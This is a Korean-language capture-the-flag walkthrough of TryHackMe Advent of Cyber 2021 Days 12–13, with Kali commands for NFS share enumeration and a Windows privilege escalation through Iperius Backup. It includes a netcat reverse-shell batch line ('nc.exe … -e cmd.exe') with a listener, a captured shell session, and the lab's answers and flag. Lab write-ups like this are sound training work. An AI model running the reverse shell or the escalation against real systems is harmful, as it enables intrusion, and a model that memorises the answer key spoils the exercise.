[TryHackMe] 계속해서 Advent of Cyber3(2021)의 Day12, 13.

7636 단어 KaliLinuxTryHackMeCTF
Welcome to Advent of Cyber 2021
크리스마스까지 25일 동안 매일 기본지식을 배우고 초보자를 대상으로 하는 새로운 안전 훈련을 실시하면 네트워크 보안을 시작할 수 있다.
day12
NFC(Network File System)는 서로 다른 컴퓨터 간에 파일을 전송할 수 있도록 하는 프로토콜입니다.
NFC 서비스가 듣고 있다는 걸 알았으니 공유된 파일을 확인하자.
┌──(kali㉿kali)-[~]
└─$ showmount -e 10.10.228.187
Export list for 10.10.228.187:
/share        (everyone)
/admin-files  (everyone)
/my-notes     (noone)
/confidential (everyone)
발견된 공유를 마운트해 보십시오.
우선 로컬에서 tmp1 만듭니다.이후 mount 명령을 사용합니다.이때 잊지 마세요sudo.
┌──(kali㉿kali)-[~]
└─$ sudo mount 10.10.228.187:/share tmp1
md5sum 명령을 사용하여 해시 값을 구한다.파일과 데이터의 내용이 하나라도 다르면 완전히 다른 해시 값이 발생하기 때문에 파일의 위조를 방지하는 데 쓰인다.
┌──(kali㉿kali)-[~]
└─$ md5sum id_rsa
3e2d315a38f377f304f5598dc2f044de  id_rsa
Answer
Scan the target server with the IP MACHINE_IP. Remember that MS Windows hosts block pings by default, so we need to add -Pn, for example, nmap -Pn MACHINE_IP for the scan to work correctly. How many TCP ports are open?
7
In the scan results you received earlier, you should be able to spot NFS or mountd, depending on whether you used the -sV option with Nmap or not. Which port is detected by Nmap as NFS or using the mountd service?
2049
How many shares did you find?
4
How many shares show “everyone”?
3
What is the title of file 2680-0.txt?
XMeditations
It seems that Grinch Enterprises has forgotten their SSH keys on our system. One of the shares contains a private key used for SSH authentication (id_rsa). What is the name of the share?
confidential
We can calculate the MD5 sum of a file using md5sum FILENAME. What is the MD5 sum of id_rsa?
3e2d315a38f377f304f5598dc2f044de
day13
학습 목표는 다음과 같다.
  • Windows의 다양한 유형의 사용자 권한 이해
  • 각종 특권 업그레이드 기술
  • 특권 남용 업그레이드의 취약성
  • RDP.
    ┌──(kali㉿kali)-[~]
    └─$ xfreerdp /u:mcskidy /p:Password1 /w:1366 /h:768 +fonts +clipboard /v:10.10.68.49
    

    초기 정보 수집net users: 대상 시스템의 사용자를 나열합니다.
    systeminfo | findstr /B /C:"OS Name" /C:"OS Version": 운영 체제에 대한 정보를 출력합니다.이 버전에 특권 업그레이드의 취약성이 있는지 더 조사해야 한다.
    sc query state= all | findstr /C:SERVICE_NAME /C:DISPLAY_NAME /C:STATE: 대상 시스템에 설치된 서비스 나열
    wmic service <サービス名> get DisplayName,name,PathName: Path인 것도 알아요.

    Iperius Backup Service에는 특권으로 업그레이드할 수 있는 취약성이 있습니다.Iperius Backup을 서비스로 설치하면 현재 사용자의 권한이 낮더라도 관리자 권한으로 백업 작업을 수행하도록 구성할 수 있습니다.
  • 새로운 백업 작업 생성임무 자체는 중요하지 않다.백업 경로는 C:\Users\McSkidy\Doocuments
  • 로 설정할 수 있습니다.


    6.1.1인 것을 알기 때문에 exploit 코드가 있는지 찾아야 합니다.(Iperis Backup Service에는 특권으로 업그레이드할 수 있는 취약성이 있습니다.)
  • 받는 사람 설정: 받는 사람 탭에서 백업에 쓸 위치를 설정할 수 있습니다.반복하지만 이것은 중요하지 않다.C:\Users\McSkidy\Desktop
  • 로 설정 가능
  • 기타 프로세스: [기타 프로세스] 태그가 중요합니다.보시다시피 모든 백업 프로세스 전이나 이후에 실행할 수 있는 설정 프로그램을 제공합니다.백업 프로세스는 관리자 권한으로 실행되기 때문에 여기에 설정된 프로그램이나 외부 파일은 관리자 권한으로 실행됩니다.

  • 이 옵션을 악용하기 위해서 간단한bat 파일을 만들고 백업하기 전에 실행합니다.
    .bat 파일은 nc입니다.편리한 C:\Users\McSkidy\Downloads\nc.exe에서 exe 유틸리티를 사용하여 셸을 시작합니다.메모장의 텍스트 편집기를 시작하고 다음 코드 줄을 입력하십시오.
    @echo off
    C:\Users\McSkidy\Downloads\nc.exe <自分IP> <port> -e cmd.exe
    

    위의 파일을 exploit.bat로 저장합니다.
  • 청중을 시작합니다.exploit.bat 파일은 cmd입니다.exe를 시작하여 5555 포트에서 자신의 기계에 다시 연결합니다.이 전보로 연결된 청중을 받을 준비가 필요하다.사용nc 공격하는 기계에 시동nc -nlvp 5555
  • ┌──(kali㉿kali)-[~]
    └─$ nc -lvnp 5555
    listening on [any] 5555 ...
    
  • 서비스로 실행: 이전에 만든 문서 백업 작업을 마우스 오른쪽 단추로 클릭하고 서비스로 백업 옵션을 선택합니다.

  • ┌──(kali㉿kali)-[~]
    └─$ nc -lvnp 5555
    listening on [any] 5555 ...
    connect to [10.8.251.120] from (UNKNOWN) [10.10.68.49] 50109
    Microsoft Windows [Version 10.0.17763.1821]
    (c) 2018 Microsoft Corporation. All rights reserved.
    
    C:\Program Files (x86)\Iperius Backup>whoami
    the-grinch-hack\thegrinch
    
    C:\Program Files (x86)\Iperius Backup>
    
    이걸로 조개를 찾았어요.
    C:\Program Files (x86)\Iperius Backup>whoami
    whoami
    the-grinch-hack\thegrinch
    





    Answer
    Complete the username: p.....
    pepper
    What is the OS version?
    10.0.17763 N/A Build 17763
    What backup service did you find running on the system?
    IperiusSvc
    What is the path of the executable for the backup service you have identified?
    XC:\Program Files (x86)\Iperius Backup\IperiusService.exe
    Run the whoami command on the connection you have received on your attacking machine. What user do you have?
    the-grinch-hack\thegrinch
    What is the content of the flag.txt file?
    THM-736635221
    The Grinch forgot to delete a file where he kept notes about his schedule! Where can we find him at 5:30?
    jazzercize

    좋은 웹페이지 즐겨찾기